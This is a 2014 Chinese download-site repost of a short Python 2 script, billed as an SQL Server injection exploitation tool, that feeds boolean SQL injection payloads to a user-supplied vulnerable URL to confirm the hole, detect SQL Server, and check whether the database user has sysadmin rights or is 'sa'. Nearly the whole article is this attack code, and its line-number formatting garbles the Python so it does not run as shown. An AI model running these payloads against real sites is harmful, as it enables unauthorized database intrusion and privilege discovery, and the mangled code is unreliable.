就下载 —— 安全下载、无毒手机软件、绿色软件官方下载网站最近更新|下载排行|热门标签|收藏本站
热门软件下载:qq2014迅雷7迅雷看看微信PPTVQQ音乐2014

您现在的位置是:就下载 > IT资讯 > 软件教程 > Python编写数据库SA用户检测方案

Python编写数据库SA用户检测方案

时间:2014-10-17 09:51:11 来源: 复制分享

无聊的时候,用Python写的一个小程序,用有注入点的链接,检测当前数据库用户是否为sa,没什么技术含量。

 # Code by zhaoxiaobu Email: [email protected]   

    #-*- coding: UTF-8 -*-    
  1. from sys import exit   from urllib import urlopen   
  2. from string import join,strip   from re import search   
  3.   
  4. def is_sqlable():      sql1="%20and%201=2" 
  5.     sql2="%20and%201=1"     urlfile1=urlopen(url+sql1)  
  6.     urlfile2=urlopen(url+sql2)      htmlcodes1=urlfile1.read()  
  7.     htmlcodes2=urlfile2.read()      if not search(judge,htmlcodes1) and search(judge,htmlcodes2):  
  8.     print "[信息]恭喜!这个URL是有注入漏洞的!\n"     print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."   
  9.     is_SQLServer()      else:  
  10.     print "[错误]你确定这个URL能用?换个别的试试吧!\n"  
  11. def is_SQLServer():      sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  12.     urlfile=urlopen(url+sql)      htmlcodes=urlfile.read()  
  13.     if not search(judge,htmlcodes):      print "[错误]数据库好像不是SQL Server的!\n" 
  14.     else:      print "[信息]确认是SQL Server数据库!\n" 
  15.     print "[信息]开始检测当前数据库用户权限,请耐心等待......"     is_sysadmin()  
  16.   
  17. def is_sysadmin():       sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  18.     urlfile = urlopen(url+sql)       htmlcodes = urlfile.read()   
  19.     if not search(judge,htmlcodes):           print "[错误]当前数据库用户不具有sysadmin权限!\n" 
  20.     else:           print "[信息]当前数据库用户具有sysadmin权限!\n" 
  21.         print "[信息]检测当前用户是不是SA,请耐心等待......"         is_sa()   
  22.  def is_sa():   
  23.     sql = "%20and%20'sa'=(select%20System_user)";      urlfile = urlopen(url+sql)   
  24.     htmlcodes = urlfile.read()       if not search(judge,htmlcodes):   
  25.         print "[错误]当前数据库用户不是SA!\n"     else:   
  26.         print "[信息]当前数据库用户是SA!\n"  
  27.             
  28.   
  29. print "\n########################################################################\n"   print "                       ^o^SQL Server注入利用工具^o^          "   
  30. print "                      Email: [email protected]\n"   print "========================================================================";   
  31. url = raw_input('[信息]请输入一个可能有注入漏洞的链接!\nURL:')   if url == '':   
  32.     print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"       exit(1)   
  33.  judge = raw_input("[信息]请提供一个判断字符串.\n判断字符串:")   
  34. if judge == '':       print "[错误]判断字符串不能为空!"   
  35.     exit(1)    
  36. is_sqlable()   
  37.   
  38.   

上一篇:文件强制删除工具Unlocker在web服务器中的应用

本文地址:软件教程 >> http://www.9xz.net/it/ruanjianjiaocheng/19390.html

下一篇:360网管版官方快速入门通道

  • 打印
相关资讯
推荐阅读
热门专题
推荐内容
热点内容

关于就下载|网站地图|下载帮助|软件提交|联系我们|版权声明| 友情链接|SITEMAP| RSS
就下载是一个免费下载站,为用户提供快速安全绿色软件下载服务,努力打造最好的下载网站!©2014 就下载(www.9xz.net)